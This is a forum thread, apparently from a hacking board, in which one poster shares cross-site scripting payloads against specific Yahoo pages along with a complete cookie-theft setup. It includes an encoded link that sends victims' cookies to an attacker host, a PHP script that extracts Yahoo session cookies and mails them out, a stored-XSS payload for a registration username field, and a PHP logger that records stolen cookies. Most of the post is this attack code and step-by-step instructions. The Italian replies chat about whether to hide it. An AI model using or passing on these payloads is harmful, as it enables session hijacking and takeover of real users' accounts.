Yahoo XSS-(con cookie grabber)

[Il_BeCcHiNo]

view 

http://email.yahoosearchmarketing.com/acq/smx/pages/profile.php? 


profile.php? 

Code: 

s=Y";><ScRipt>alert('testByKhalsa');</script> 

Code: 

o=INVALID";><ScRipt>alert('testByKhalsa');</script> 

Code: 

s3=";><ScRipt>alert('testByKhalsa');</script> 

Code: 

s2=";><ScRipt>alert('testByKhalsa');</script> 


----------------------------------------------------------------------------------------------------------- 


cookie stealing link : 
Code: 

http://tw.bbs.yahoo.com/cgi-bin/LocalSearch.cgi?board=&database=bid&keyword=&type=1&query='%3C%2F%53%43%52%49%50%54%3E%3C%53%43%52%49%50%54%3E%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%68%6F%73%74%2E%63%6F%6D%2F%67%72%61%62%62%65%72%2E%70%68%70%3F%63%6F%6F%6B%69%65%3D%22%2B%65%73%63%61%70%65%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%53%43%52%49%50%54%3E 

php grabber : 
Code: 

<?php 
$cookie = $_GET[cookie]; 
$Y = explode('Y=', $cookie); 
$Y = $Y[1]; 
$Y = explode(';', $Y); 
$Y = $Y[0]; 
$T = explode('T=', $cookie); 
$T = $T[1]; 
$T = explode(';', $T); 
$T = $T[0]; 
$msg = "<html>Y=".$Y." <br> 
<p>T=".$T."<br></html>"; 
$header = "Content-Type: text/html; charset=ISO-8859-4"; 
echo $msg; 
mail('[email protected]', 'cookie', $msg, $header); 
header('Location: http://www.google.ro'); 

?> 

intructions : 
Code: 

Unescape the escaped chars in the stealing link and change the www.host.com to your host and then escape them back. 

------------------------------------------------------------------------------------- 

it goes like that: 
you need to "register" yourself an "account" or something... 
stupid thing but it works... 
go to: 
https://buzz.research.yahoo.com/dm/login/register.html 
on "username" insert this code: 

'><SCRIPT>location.href="http://www.yourhost.com/c.php?c="+escape(document.cookie)</SCRIPT> 

this is the c.php: 
<?php 
$cookie = $_GET['c']; 
$ip = getenv ('REMOTE_ADDR'); 
$date=date("m/d/Y g:i:s a"); 
$referer=getenv ('HTTP_REFERER'); 
$fl = fopen('log.txt', 'a'); 
fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n"); 
fclose($fl); 
?> 

and make *.txt file: 
log.txt 
and now upload it to your server. 

CHMOD: 777 

now on yahoo..click on "I Agree/Register" 
and you will get on the adress bar something like that: 
https://buzz.research.yahoo.com/dm/l...tml?eid=223322 
now this is your cookie stealer..this link: 
https://buzz.research.yahoo.com/dm/l...tml?eid=223322 (random number) 
example: 
https://buzz.research.yahoo.com/dm/l...er.html?eid=21 
i'll appreciate a good posts from you. 
"thanks, good work" etc... 
have a nice day. :-)

:tunz:

 

[imported_KRONOS]

Thanks...

 

[Il_BeCcHiNo]

di che figurati,dovevo criptarlo?

 

[imported_KRONOS]

di che figurati,dovevo criptarlo?

bha fai come vuoi...

 

[Il_BeCcHiNo]

sinceramente m'annoia lol la lascio così

 

[imported_KRONOS]

okkk

 

[cHoco]

la pigrizia è sempre buona consigliera asdasdasd

 

[Il_BeCcHiNo]

quoto hai proprio ragione, stavolta mi consiglia di lasciarla così e poi se so lamer, neanche la sapranno usare